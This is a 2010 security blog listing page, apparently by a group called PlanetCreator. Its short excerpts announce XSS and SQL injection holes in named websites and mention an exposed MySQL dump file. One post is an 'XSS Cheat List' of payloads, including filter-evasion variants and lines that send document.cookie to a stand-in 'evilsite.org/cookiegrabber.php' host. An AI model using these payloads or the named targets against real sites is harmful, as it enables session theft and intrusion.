Critical XSS vulnerability in YouthDreams.Net

September 13, 2010 PlanetCreator 0 Comments 0 tags

Security Researcher $@T0R! reported another XSS vulnerability in http://www.youthdreams.net Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject

Read More

PlanetCreator advised Pfingo’s Webmasters to check their Security

September 13, 2010 PlanetCreator 0 Comments 0 tags

We found some security weaknesses in Pfingo.com They still have to fix and have to delete MySQL dump files in their directory. We notified this issue to pfingo yesterday! pfingoadmin.sql

Read More

XSS Cheat List

September 4, 2010 PlanetCreator 0 Comments 0 tags

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More

Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

September 2, 2010 PlanetCreator 0 Comments 0 tags

Security Researcher $@T0R! reported another Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer

Read More

Critical SQL Injection in singforyou.net

August 31, 2010 PlanetCreator 0 Comments 0 tags

Security Researcher $@T0R! has reported another Critical SQL Injection in singforyou.net SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an

Read More

25 per cent of new worms designed to spread via USB

August 30, 2010 PlanetCreator 0 Comments 0 tags

48 per cent of SMBs are infected by worms each year according to a report published by security vendor PandaLabs. The Second International SMB Security Barometer report (PDF here) surveyed

Read More

Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/

August 30, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/ Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications

Read More